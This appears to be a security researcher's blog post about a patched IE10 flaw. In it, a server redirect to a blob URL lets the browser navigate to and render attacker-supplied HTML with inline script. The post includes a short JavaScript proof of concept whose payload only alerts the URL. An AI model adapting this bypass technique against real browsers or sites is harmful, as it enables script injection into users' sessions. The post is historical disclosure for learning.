IE10: Rendering HTML Blob Content via Server Redirect Bypasses Blob URL Restriction

Blob URLs were not supposed to be usable as iframe src or browser navigation targets — they were intended only for images, scripts, CSS, and workers. I found that this restriction could be bypassed by pointing a server redirect at the blob URL. The redirect caused the browser to navigate to the blob as if it were a legitimate URL, fully rendering the HTML content including inline scripts. Credits for the underlying research direction go to Gareth Heyes and Mario Heiderich.

var bb = new MSBlobBuilder();
bb.append('Check out the address bar!<br /><br />I am HTML content rendered from a Blob!<br /><br />My URL is: <script>document.write(document.URL);setTimeout(\'alert(document.URL)\')<\/script>');
var blob = bb.getBlob("text/html");
var blobUrl = window.URL.createObjectURL(blob);
location.href = "redirect.aspx?URL=" + blobUrl;

A blob containing HTML with a <script> tag was created with MIME type text/html. A server-side redirect returned the blob URL as the Location header. The browser followed it, rendered the blob as a full HTML document, and executed the inline script — displaying the blob URL in the address bar. This opened a path to rendering attacker-controlled HTML in a context the browser treated as a navigated document.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 EoP: window.open in Destroyed iframe Triggers EXPLOITABLE DEP Violation] :: [IE10 EoP: Invalid Content-Type on Blob URL Server Redirect is PROBABLY_EXPLOITABLE] >